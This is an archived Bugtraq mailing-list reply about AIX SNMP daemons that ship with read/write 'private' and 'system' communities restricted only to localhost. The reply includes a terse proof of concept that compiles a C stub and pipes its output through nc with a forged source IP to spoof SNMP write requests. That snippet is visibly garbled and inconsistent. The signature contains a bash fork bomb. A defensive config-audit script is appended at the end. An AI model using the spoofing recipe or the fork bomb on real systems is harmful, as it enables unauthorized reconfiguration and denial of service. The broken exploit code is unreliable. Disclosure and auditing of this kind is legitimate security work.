Bugtraq mailing list archives

Re: AIX SNMP Defaults
From: lcamtuf () DIONE IDS PL (Michal Zalewski)
Date: Thu, 17 Feb 2000 11:28:54 +0100

On Tue, 15 Feb 2000, harikiri wrote:

It appears that on the above releases of AIX, the SNMP daemon is
enabled by default and two community names are enabled with read/write
privileges. The community names are "private" and "system", but are
only allowed from localhost connections. Nevertheless, a local user
may install an SNMP client, and modify sensitive variables.

SNMP requests with no authentication except for source-IP comparison, are


cat >/tmp/spoof1.c <<_EOF_
main() {  write(1,private,sizeof(private)); }

gcc -o /tmp/spoof1 /tmp/spoof1.c

/tmp/spoof2 | nc -s FakeSourceIPHere -u RemoteIPHere 161

UDP blind spoofing, nothing easier.

Michal Zalewski * [lcamtuf () ags pl] <=> [AGS WAN SYSADM]
[dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
[+48 22 813 25 86] [+48 603 110 160] bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
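
A defender-side check for the configuration discussed in this thread, as an added example that is not part of either post: it scans an snmpd.conf-style file for communities that have write access and are guarded only by a source address and netmask. The `community <name> <address> <netmask> <permissions>` line layout, the read-only default and the sample file contents are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example: flag SNMP communities that have write access and rely on
# a source-address restriction, which UDP source spoofing defeats.
# Assumed line layout (not taken from the post):
#   community <name> [<address> <netmask> [<permissions> [<view>]]]

audit_snmpd_conf() {
    # $1: path to the configuration file to audit
    awk '
        /^[ \t]*#/ { next }                     # skip comment lines
        tolower($1) != "community" { next }     # only community entries
        {
            name = $2
            addr = (NF >= 3) ? $3 : "any"
            mask = (NF >= 4) ? $4 : "any"
            # Assumption: an entry without a permissions field is read-only.
            perm = (NF >= 5) ? tolower($5) : "readonly"
            if (perm == "readwrite" || perm == "writeonly") {
                if (addr == "any")
                    scope = "no source restriction"
                else
                    scope = "source check only: " addr "/" mask
                printf "WRITE %s (%s)\n", name, scope
            }
        }
    ' "$1"
}

# Constructed sample configuration, modelled on the defaults described above.
sample_conf() {
    cat <<'EOF'
# constructed sample, not a real system file
community public
community private 127.0.0.1 255.255.255.255 readWrite
community system  127.0.0.1 255.255.255.255 readWrite 1.17.2
community monitor 192.0.2.10 255.255.255.255 readOnly
EOF
}

run_sample_audit() {
    tmp=$(mktemp) || return 1
    sample_conf > "$tmp"
    audit_snmpd_conf "$tmp"
    rm -f "$tmp"
}

run_sample_audit
```

Every `WRITE` line is a community whose only barrier is the source address of a UDP datagram, so it should be removed, downgraded to read-only, or backed by packet filtering that drops loopback-sourced traffic arriving on external interfaces.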
